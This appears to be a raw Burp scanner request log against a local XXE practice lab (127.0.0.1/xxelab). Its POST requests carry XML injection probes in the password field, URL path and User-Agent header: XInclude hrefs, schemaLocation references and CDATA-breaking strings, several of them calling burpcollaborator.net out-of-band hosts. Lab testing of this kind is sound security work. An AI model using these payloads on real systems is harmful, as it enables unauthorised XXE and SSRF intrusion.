Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com]]>><</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 197
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>tnk75rjrajqhelvf1f8gky59f0lv9lxdl580wp.burpcollaborator.net</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 376
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password><kkr xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://darrsb6bx3d115izozv07ist2k8fw5k58xvsjh.burpcollaborator.net/kkr.xsd">kkr</kkr></password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 321
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password><sul xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://re95wpap1hhf5jmdsdzebww76yct0jokccz7nw.burpcollaborator.net/foo"/></sul></password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234]]>><</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: 6u1kc4q4hwxuly2s8sftrbcmmds8gy4qslfb30.burpcollaborator.net
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /wrra9unuemukiozi5icjo19cj3pydo1gpdc30s.burpcollaborator.net/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /%3cxgo%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//kl9y3ihi8ao8cct6z667ip30drjm7cvcj96zuo.burpcollaborator.net/xgo.xsd%22%3exgo%3c/xgo%3e/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /%3cjhx%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//nmd14lil9dpbdfu9097ajs43eukp8fwgkd73vs.burpcollaborator.net/foo%22/%3e%3c/jhx%3e/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab]]%3e%3e%3c/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/m9w0rk5kwcca0eh8n8u96rr21t7ovej673uuij.burpcollaborator.net/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/%3cwoz%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//fo7t6dkdb5r3f7w12192lk6vgmmha7y7m49vxk.burpcollaborator.net/woz.xsd%22%3ewoz%3c/woz%3e/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/%3czxp%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//d2grkbybp351t5azgzn0ziktuk0fo5c603nubj.burpcollaborator.net/foo%22/%3e%3c/zxp%3e/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab]]%3e%3e%3c/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/g2jukeyep654t8a2g2n3zlkwun0io8c00rsei27.burpcollaborator.net HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/%3chfz%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//c0dqiawan230r48yeylzxhissjyem4a4yvqig65.burpcollaborator.net/hfz.xsd%22%3ehfz%3c/hfz%3e HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/%3chkp%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//w0xaiuwunm3kro8ieiljx1ics3yymoapygq3gr5.burpcollaborator.net/foo%22/%3e%3c/hkp%3e HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php]]%3e%3e%3c HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================